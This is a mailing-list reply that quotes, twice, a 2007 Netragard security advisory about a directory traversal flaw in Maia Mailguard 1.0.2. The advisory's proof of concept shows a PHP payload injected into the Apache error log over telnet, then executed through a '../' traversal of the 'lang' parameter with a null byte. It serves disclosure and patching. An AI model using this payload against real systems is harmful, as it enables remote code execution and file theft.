How does this relate to amavisd? On Jul 5, 2007, at 4:18 PM, Michael Scheidell wrote:
> didn't see this anywhere, thought you might want to know: > > > -- > Michael Scheidell, CTO > SECNAP Network Security Corporation > Keep up to date with latest information on IT security: Real time > security alerts: > http://www.secnap.com/news > > > -----Original Message----- > From: Netragard Security Advisories [mailto:[EMAIL PROTECTED] > Sent: Thursday, July 05, 2007 11:19 AM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; > [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]; > [EMAIL PROTECTED]; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Subject: [NETRAGARD SECURITY ADVISORY][Maia Mailguard 1.0.2 Arbitrary > Code Execution][NETRAGARD-20070628] > > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > *************************** NETRAGARD ADVISORY > ************************ > http://www.netragard.com > "We make IT Safe" > [Advisory Summary] > - > ---------------------------------------------------------------------- > - > Advisory Author : Adriel T. Desautels > Advisory ID : NETRAGARD-20070628 > Product Name : Maia Mailguard > Product Version : <= 1.0.2 FreeBSD and Possibly More > Vendor Name : http://www.miamailguard.com > Type of Vulnerability : Directory Traversal / File Read > Effort (1-10 where 1 == easy) : 2 > Impact : Arbitrary Code Execution > Vendor Notified : Yes > Patch Released : N/A > Discovery Date : 06/10/2007 > > > > > [POSTING NOTICE] > - > ---------------------------------------------------------------------- > - > If you intend to post this advisory on your web-site you must > provide a > clickable link back to http://www.netragard.com as the contents of > this > advisory may be updated without notice. > > > > > [Product Description] > - > ---------------------------------------------------------------------- > - > "Maia Mailguard is a web-based interface and management system > based on > the popular amavisd-new e-mail scanner and SpamAssassin. Written in > Perl > and PHP, Maia Mailguard gives end-users control over how their mail is > processed by virus scanners and spam filters, while giving mail > administrators the power to configure site-wide defaults and limits." > > - -- http://www.miamailguard.com -- > > > > > [Technical Summary] > - > ---------------------------------------------------------------------- > - > A Directory Traversal vulnerability exists in the Maia Mailguard Web > Application that enables an attacker to execute arbitrary commands on > the affected system. > > > > > [Technical Details] > - > ---------------------------------------------------------------------- > - > Improper input validation on the "lang" variable in Maia Mailguard web > application has resulted in a Directory Traversal vulnerability > that can > be used to execute arbitrary commands on he affected system, or, to > read > arbitrary files on the affected system. > > > > > [Proof Of Concept] > - > ---------------------------------------------------------------------- > - > 1-) An attacker can inject code into the httpd-error.log file by > connecting to port 80 on the affected system and issuing a "get > <CODE HERE>" command. See example below: > > the-wretched:~ simon$ telnet maiatest.snosoft.com 80 > Trying 10.0.0.128... > Connected to maiatest.snosoft.com. > Escape character is '^]'. > > get <pre>><?php system('ls -laf /var/log');?> > > HTTP/1.1 400 Bad Request > Date: Wed, 20 Jun 2007 21:31:58 GMT > Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/ > 2.8.28 > OpenSSL/0.9.7e-p1 > Connection: close > Content-Type: text/html; charset=iso-8859-1 > > 2-) Once the attacker has injected his code into the log file, the > code > can be executed by forcing the web application to read the log > file. > When the log file is read, the code is executed. Below is an > example > of code execution: > > the-wretched:~ simon$ wget > http://maiatest.snosoft.com/maia/login.php?lang= > ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt > > > > > [Vendor Status] > - > ---------------------------------------------------------------------- > - > Vendor has been notified and was quick to resolve the issue. > > > > > [Vendor Comments] > - > ---------------------------------------------------------------------- > - > "The only addition that I had was that it seems to only affect systems > like freebsd... It would be nice to nail that down. It suspect the > root security issue is really with the php and file-system > interaction... my patch just simply works around and blocks the root > problem. From my developer point of view, I'm asking for one file > and the file-system is giving us something else. That's a serious > risk. > If we could at least express that concern, I think that would be > prudent. > > Chicken and egg problem, I was kinda waiting on you to post our own > ticket, but.... I can add a comment afterwards. OK. Here's our ticket > which also references the changeset: > > http://www.maiamailguard.org/maia/ticket/479 > > A unified patch may be retrieved from: http://www.maiamailguard.org/ > maia/changeset/1184?format=diff&new=1184 > > David Morton" > > > > > [Disclaimer] > - > ----------------------http:// > www.netragard.com------------------------- > Netragard, L.L.C. assumes no liability for the use of the information > provided in this advisory. This advisory was released in an effort to > help the I.T. community protect themselves against a potentially > dangerous security hole. This advisory is not an attempt to solicit > business. > > <a href="http://www.netragard.com> > http://www.netragard.com > </a> > > > > > > > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.5 (Darwin) > > iD8DBQFGjQvXQwbn1P9Iaa0RAtkkAKCLZzwMLPPejeXmpXoYCMqvGdaF4QCgqALm > 4LRwop09S8YjiKDwTSpvgXY= > =TeIH > -----END PGP SIGNATURE----- > > ______________________________________________________________________ > ___ > This email has been scanned and certified safe by SpammerTrap(tm). > For Information please see http://www.spammertrap.com > ______________________________________________________________________ > ___ > > > *************************** NETRAGARD ADVISORY > ************************ > http://www.netragard.com > "We make IT Safe" > [Advisory Summary] > ---------------------------------------------------------------------- > - > Advisory Author : Adriel T. Desautels > Advisory ID : NETRAGARD-20070628 > Product Name : Maia Mailguard > Product Version : <= 1.0.2 (All Platforms) > Vendor Name : http://www.miamailguard.com > Type of Vulnerability : Directory Traversal / File Read > Effort (1-10 where 1 == easy) : 2 > Impact : Arbitrary Code Execution > Vendor Notified : Yes > Patch Released : N/A > Discovery Date : 06/10/2007 > > [POSTING NOTICE] > ---------------------------------------------------------------------- > - > If you intend to post this advisory on your web-site you must provide > a clickable link back to http://www.netragard.com as the contents of > this advisory may be updated without notice. > > [Product Description] > ---------------------------------------------------------------------- > - > "Maia Mailguard is a web-based interface and management system > based on > the popular amavisd-new e-mail scanner and SpamAssassin. Written in > Perl > and PHP, Maia Mailguard gives end-users control over how their mail is > processed by virus scanners and spam filters, while giving mail > administrators the power to configure site-wide defaults and limits." > > -- http://www.miamailguard.com -- > > [Technical Summary] > ---------------------------------------------------------------------- > - > A Directory Traversal vulnerability exists in the Maia Mailguard Web > Application that enables an attacker to execute arbitrary commands on > the affected system. > > [Technical Details] > ---------------------------------------------------------------------- > - > Improper input validation on the "lang" variable in Maia Mailguard web > application has resulted in a Directory Traversal vulnerability that > can be used to execute arbitrary commands on he affected system, > or, to > read arbitrary files on the affected system. > > [Proof Of Concept] > ---------------------------------------------------------------------- > - > 1-) An attacker can inject code into the httpd-error.log file by > connecting to port 80 on the affected system and issuing a "get > <CODE HERE>" command. See example below: > > the-wretched:~ simon$ telnet maiatest.snosoft.com 80 > Trying 10.0.0.128... > Connected to maiatest.snosoft.com. > Escape character is '^]'. > > get <pre>><?php system('ls -laf /var/log');?> > > HTTP/1.1 400 Bad Request > Date: Wed, 20 Jun 2007 21:31:58 GMT > Server: Apache/1.3.37 (Unix) PHP/5.2.1 with Suhosin-Patch mod_ssl/ > 2.8.28 OpenSSL/0.9.7e-p1 > Connection: close > Content-Type: text/html; charset=iso-8859-1 > > 2-) Once the attacker has injected his code into the log file, the > code > can be executed by forcing the web application to read the log > file. > When the log file is read, the code is executed. Below is an > example > of code execution: > > the-wretched:~ simon$ wget http://maiatest.snosoft.com/maia/ > login.php?lang= > ../../../../../../../../../../../../../var/log/httpd-error.log%00.txt > > [Vendor Status] > ---------------------------------------------------------------------- > - > Vendor has been notified and has been very quick to respond to and > patch this issue. > > [Vendor Comments] > ---------------------------------------------------------------------- > - > "The only addition that I had was that it seems to only affect systems > like freebsd... It would be nice to nail that down. It suspect the > root security issue is really with the php and filesystem > interaction... my patch just simply works around and blocks the root > problem. From my developer point of view, I'm asking for one file > and the filesystem is giving us something else. That's a serious > risk. If we could at least express that concern, I think that would > be prudent. > > Chicken and egg problem, I was kinda waiting on you to post our own > ticket, but.... I can add a comment afterwards. OK. > Here's our ticket which also references the changeset: > > http://www.maiamailguard.org/maia/ticket/479 > > A unified patch may be retrieved from: http://www.maiamailguard.org/ > maia/changeset/1184?format=diff&new=1184 > > David Morton" > > > > [Disclaimer] > ----------------------http:// > www.netragard.com------------------------- > Netragard, L.L.C. assumes no liability for the use of the information > provided in this advisory. This advisory was released in an effort to > help the I.T. community protect themselves against a potentially > dangerous security hole. This advisory is not an attempt to solicit > business. > > <a href="http://www.netragard.com> > http://www.netragard.com > </a> > > > > > > > > ---------------------------------------------------------------------- > --- > This SF.net email is sponsored by DB2 Express > Download DB2 Express C - the FREE version of DB2 express and take > control of your XML. No limits. Just data. Click to get it now. > http://sourceforge.net/powerbar/db2/ > _______________________________________________ > AMaViS-user mailing list > [email protected] > https://lists.sourceforge.net/lists/listinfo/amavis-user > AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 > AMaViS-HowTos:http://www.amavis.org/howto/ -- Jo Rhett Net Consonance : consonant endings by net philanthropy, open source and other randomness ------------------------------------------------------------------------- This SF.net email is sponsored by DB2 Express Download DB2 Express C - the FREE version of DB2 express and take control of your XML. No limits. Just data. Click to get it now. http://sourceforge.net/powerbar/db2/ _______________________________________________ AMaViS-user mailing list [email protected] https://lists.sourceforge.net/lists/listinfo/amavis-user AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3 AMaViS-HowTos:http://www.amavis.org/howto/
